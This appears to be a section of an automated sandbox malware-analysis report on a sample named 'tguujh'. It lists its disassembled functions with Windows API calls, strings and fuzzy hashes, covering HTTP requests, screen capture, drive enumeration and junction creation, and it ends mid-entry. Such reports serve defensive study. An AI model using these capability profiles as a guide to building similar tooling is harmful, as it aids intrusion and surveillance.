                                                              • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 1839972693-4113822522
                                                              • Opcode ID: 162fd02fb18527de99659751ef9ff7a960298b00157d03b958e8a1154d363ce8
                                                              • Instruction ID: 4f830901f27b9c6d30d967386c44dc7cb791fa8c230e9ba9d6f32a38c100c374
                                                              • Opcode Fuzzy Hash: 162fd02fb18527de99659751ef9ff7a960298b00157d03b958e8a1154d363ce8
                                                              • Instruction Fuzzy Hash: 7E71F3365042129FC714EF24C890A6FB7F5EF94754F00892CF8A6972A1EB30DE89DB91
                                                              Function 00CB62AA Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadIconW.USER32(00000063), ref: 00CB62BD
                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CB62CF
                                                              • SetWindowTextW.USER32(?,?), ref: 00CB62E6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00CB62FB
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00CB6301
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00CB6311
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00CB6317
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00CB6338
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00CB6352
                                                              • GetWindowRect.USER32(?,?), ref: 00CB635B
                                                              • _wcslen.LIBCMT ref: 00CB63C2
                                                              • SetWindowTextW.USER32(?,?), ref: 00CB63FE
                                                              • GetDesktopWindow.USER32 ref: 00CB6404
                                                              • GetWindowRect.USER32(00000000), ref: 00CB640B
                                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00CB6462
                                                              • GetClientRect.USER32(?,?), ref: 00CB646F
                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00CB6494
                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00CB64BE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                              • String ID:
                                                              • API String ID: 895679908-0
                                                              • Opcode ID: 53d400db40737b439ebbddd3f7e1b56c2dc6aa3933a6ba36eb3224fae7904295
                                                              • Instruction ID: 6709cdda6a210d1ac0a15e2137fae487c6ee568eca9e66612d22dbb1a9cf155d
                                                              • Opcode Fuzzy Hash: 53d400db40737b439ebbddd3f7e1b56c2dc6aa3933a6ba36eb3224fae7904295
                                                              • Instruction Fuzzy Hash: 88718131900745AFDB20DFA9CE85BAEBBF5FF48705F104928E156A62A0D779EA44CF10
                                                              Function 00CD076B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00CD0784
                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00CD078F
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00CD079A
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00CD07A5
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00CD07B0
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00CD07BB
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00CD07C6
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00CD07D1
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00CD07DC
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00CD07E7
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00CD07F2
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00CD07FD
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00CD0808
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00CD0813
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00CD081E
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00CD0829
                                                              • GetCursorInfo.USER32(?), ref: 00CD0839
                                                              • GetLastError.KERNEL32 ref: 00CD087B
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                              • String ID:
                                                              • API String ID: 3215588206-0
                                                              • Opcode ID: db83d012a7aa10f4de75d1cb26cfc8d17b51664f52bdcd63c58139e91595a7cd
                                                              • Instruction ID: 3c2399688710f59ba8e8fe2c66eb212d5a82570c0c477c72900be1c045d053c1
                                                              • Opcode Fuzzy Hash: db83d012a7aa10f4de75d1cb26cfc8d17b51664f52bdcd63c58139e91595a7cd
                                                              • Instruction Fuzzy Hash: 524143B0D083196ADB10DFBA8C8995EBFE8FF04754B50452AE11DEB291DB78E901CF91
                                                              Function 00C70456 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00C70456
                                                                • Part of subcall function 00C7047D: InitializeCriticalSectionAndSpinCount.KERNEL32(00D2170C,00000FA0,45F80808,?,?,?,?,00C92753,000000FF), ref: 00C704AC
                                                                • Part of subcall function 00C7047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00C92753,000000FF), ref: 00C704B7
                                                                • Part of subcall function 00C7047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00C92753,000000FF), ref: 00C704C8
                                                                • Part of subcall function 00C7047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00C704DE
                                                                • Part of subcall function 00C7047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C704EC
                                                                • Part of subcall function 00C7047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C704FA
                                                                • Part of subcall function 00C7047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C70525
                                                                • Part of subcall function 00C7047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C70530
                                                              • ___scrt_fastfail.LIBCMT ref: 00C70477
                                                                • Part of subcall function 00C70433: __onexit.LIBCMT ref: 00C70439
                                                              Strings
                                                              • InitializeConditionVariable, xrefs: 00C704D8
                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C704B2
                                                              • WakeAllConditionVariable, xrefs: 00C704F2
                                                              • SleepConditionVariableCS, xrefs: 00C704E4
                                                              • kernel32.dll, xrefs: 00C704C3
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                              • API String ID: 66158676-1714406822
                                                              • Opcode ID: 75af1cd83d750d116d67aab4e276be6a94de2aa598314a1d4478ead973cbc5d5
                                                              • Instruction ID: 569476b3e9b01ce1a191e06896b608958d0a28fb7d2b7cb8366cbda19bbf26b6
                                                              • Opcode Fuzzy Hash: 75af1cd83d750d116d67aab4e276be6a94de2aa598314a1d4478ead973cbc5d5
                                                              • Instruction Fuzzy Hash: BC210136A40354EBD7606BB4AC46B6D77E4EB54F65F208129FA1ADB290DBA08C008B65
                                                              Function 00CC4E1A Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharLowerBuffW.USER32(00000000,00000000,00CEDCD0), ref: 00CC4E81
                                                              • _wcslen.LIBCMT ref: 00CC4E95
                                                              • _wcslen.LIBCMT ref: 00CC4EF3
                                                              • _wcslen.LIBCMT ref: 00CC4F4E
                                                              • _wcslen.LIBCMT ref: 00CC4F99
                                                              • _wcslen.LIBCMT ref: 00CC5001
                                                                • Part of subcall function 00C6FD60: _wcslen.LIBCMT ref: 00C6FD6B
                                                              • GetDriveTypeW.KERNEL32(?,00D17C10,00000061), ref: 00CC509D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$BuffCharDriveLowerType
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2055661098-1000479233
                                                              • Opcode ID: 3294dfe975bd6f5df8820706fe467898ba22df8ede73b75da796167b58a35fcf
                                                              • Instruction ID: b26f179a8e63dfb33ec9ae0854827c3992bbdad8a8e8f0bbf9352e2f06999916
                                                              • Opcode Fuzzy Hash: 3294dfe975bd6f5df8820706fe467898ba22df8ede73b75da796167b58a35fcf
                                                              • Instruction Fuzzy Hash: 02B1C1316087029FC714DF28D990E6AB7E5BF94760F50891DF4A6C7292DB30E985CB92
                                                              Function 00CD4946 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00CEDCD0), ref: 00CD4A18
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CD4A2A
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00CEDCD0), ref: 00CD4A4F
                                                              • FreeLibrary.KERNEL32(00000000,?,00CEDCD0), ref: 00CD4A9B
                                                              • StringFromGUID2.OLE32(?,?,00000028,?,00CEDCD0), ref: 00CD4B05
                                                              • SysFreeString.OLEAUT32(00000009), ref: 00CD4BBF
                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CD4C25
                                                              • SysFreeString.OLEAUT32(?), ref: 00CD4C4F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 354098117-199464113
                                                              • Opcode ID: e893f92bf274ec1cbdc1dd7d4c38c51f981f66667bea58b011bba3954ef0f410
                                                              • Instruction ID: 7790892abb11b89bb0ff06062c16166e9c08fa6c89b2e4227c3a674ee361a302
                                                              • Opcode Fuzzy Hash: e893f92bf274ec1cbdc1dd7d4c38c51f981f66667bea58b011bba3954ef0f410
                                                              • Instruction Fuzzy Hash: 79123C71A00105EFDB18DF54C884EAEB7B5FF45315F248099EA19AB351D731EE86CBA0
                                                              Function 00CCCDD3 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CCCE0D
                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00CCCE20
                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00CCCE34
                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CCCE4D
                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00CCCE90
                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CCCEA6
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CCCEB1
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CCCEE1
                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00CCCF39
                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00CCCF4D
                                                              • InternetCloseHandle.WININET(00000000), ref: 00CCCF58
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                              • String ID:
                                                              • API String ID: 3800310941-3916222277
                                                              • Opcode ID: 47e6c8d9103890ec686749c4ea3ccec49b6351588e664f1e38a7610f4bfba9d3
                                                              • Instruction ID: 7e1ab5b36bf59fbc3ecdfc9a7fd82f3fc9c881ce2d323b22ad67d5491e43ef6b
                                                              • Opcode Fuzzy Hash: 47e6c8d9103890ec686749c4ea3ccec49b6351588e664f1e38a7610f4bfba9d3
                                                              • Instruction Fuzzy Hash: 17514BB1500608BFDB219FA1C988FAA7BBDFF08754F10842DF95ADA250D774DA449BA0
                                                              Function 00CE8ECE Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00CE8EF1
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CE8F01
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CE8F0C
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CE8F19
                                                              • GlobalLock.KERNEL32(00000000), ref: 00CE8F27
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CE8F36
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00CE8F3F
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CE8F46
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CE8F57
                                                              • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00CF0C04,?), ref: 00CE8F70
                                                              • GlobalFree.KERNEL32(00000000), ref: 00CE8F80
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00CE8FA0
                                                              • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00CE8FD0
                                                              • DeleteObject.GDI32(?), ref: 00CE8FF8
                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CE900E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                              • String ID:
                                                              • API String ID: 3840717409-0
                                                              • Opcode ID: 33d8f35942900976ab9efc02d800c8993e7abe11a4842688f784b743841b46a5
                                                              • Instruction ID: 9c570d1b3b6c1c43f1c8a5bf2c56141ba7fbdad07aa00d63b6e6dcef6a814b29
                                                              • Opcode Fuzzy Hash: 33d8f35942900976ab9efc02d800c8993e7abe11a4842688f784b743841b46a5
                                                              • Instruction Fuzzy Hash: 1D411A75600245AFDB11DFA5DC88FAE7BB9EF89761F104058F91ADB260DB309E45CB20
                                                              Function 00CD2EB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00CD2F35
                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00CD2F45
                                                              • CreateCompatibleDC.GDI32(?), ref: 00CD2F51
                                                              • SelectObject.GDI32(00000000,?), ref: 00CD2F5E
                                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00CD2FCA
                                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00CD3009
                                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00CD302D
                                                              • SelectObject.GDI32(?,?), ref: 00CD3035
                                                              • DeleteObject.GDI32(?), ref: 00CD303E
                                                              • DeleteDC.GDI32(?), ref: 00CD3045
                                                              • ReleaseDC.USER32(00000000,?), ref: 00CD3050
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                              • String ID: (
                                                              • API String ID: 2598888154-3887548279
                                                              • Opcode ID: 346cb13bd3820b4b25b78aee546fbec803105f75af53aee7bd4120656d1bd8d8
                                                              • Instruction ID: 51913bda959429749fa3532055fbbc6e138553b2806d98a97b1711ae94815508
                                                              • Opcode Fuzzy Hash: 346cb13bd3820b4b25b78aee546fbec803105f75af53aee7bd4120656d1bd8d8
                                                              • Instruction Fuzzy Hash: 7361D3B5D00219EFCF14CFE8D884AAEBBB5FF48310F24851AE656A7250D771A941DF50
                                                              Function 00CBC80C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(00D22990,000000FF,00000000,00000030), ref: 00CBC888
                                                              • SetMenuItemInfoW.USER32(00D22990,00000004,00000000,00000030), ref: 00CBC8BD
                                                              • Sleep.KERNEL32(000001F4), ref: 00CBC8CF
                                                              • GetMenuItemCount.USER32(?), ref: 00CBC915
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00CBC932
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00CBC95E
                                                              • GetMenuItemID.USER32(?,?), ref: 00CBC9A5
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CBC9EB
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CBCA00
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CBCA21
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                              • String ID: 0
                                                              • API String ID: 1460738036-4108050209
                                                              • Opcode ID: 5700769760402e0cfb024bfd6e65a4f9658dccc83136de1d22c3826ff8f3e478
                                                              • Instruction ID: 380f6511827a736752aff06568c287588d2ae9763992f8b1a06ecabbb438f6b3
                                                              • Opcode Fuzzy Hash: 5700769760402e0cfb024bfd6e65a4f9658dccc83136de1d22c3826ff8f3e478
                                                              • Instruction Fuzzy Hash: 2B616CB090025AABEF21CF64D8C8AFFBBA8FB45304F040119F861A7291D735AE55DB60
                                                              Function 00CBE3D7 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00CBE3E9
                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00CBE40F
                                                              • _wcslen.LIBCMT ref: 00CBE419
                                                              • _wcsstr.LIBVCRUNTIME ref: 00CBE469
                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00CBE485
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                              • API String ID: 1939486746-1459072770
                                                              • Opcode ID: f285a73242a3f7c7723ef7656dbc4d5f479c5b1daa645a47de5789007dfd3b91
                                                              • Instruction ID: 71ab302d6e7977d091edd7173316cf61011eb2977d1dc8e17b88431f977889ec
                                                              • Opcode Fuzzy Hash: f285a73242a3f7c7723ef7656dbc4d5f479c5b1daa645a47de5789007dfd3b91
                                                              • Instruction Fuzzy Hash: A64127726402147BEB10AB649C47FFF3BACEF55710F108069F809A61D2EB74AA01A7B5
                                                              Function 00CC4678 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CC469A
                                                              • _wcslen.LIBCMT ref: 00CC46C7
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CC46F7
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CC4718
                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00CC4728
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CC47AF
                                                              • CloseHandle.KERNEL32(00000000), ref: 00CC47BA
                                                              • CloseHandle.KERNEL32(00000000), ref: 00CC47C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                              • String ID: :$\$\??\%s
                                                              • API String ID: 1149970189-3457252023
                                                              • Opcode ID: 0d6657320d88a40092bcf0e289c386e8156eeb0b488bedc1cf537ffb6830505d
                                                              • Instruction ID: eae5c8befbed40b3ffdbf6588397dd7a28abe2785257428f74736de0b52d3c93
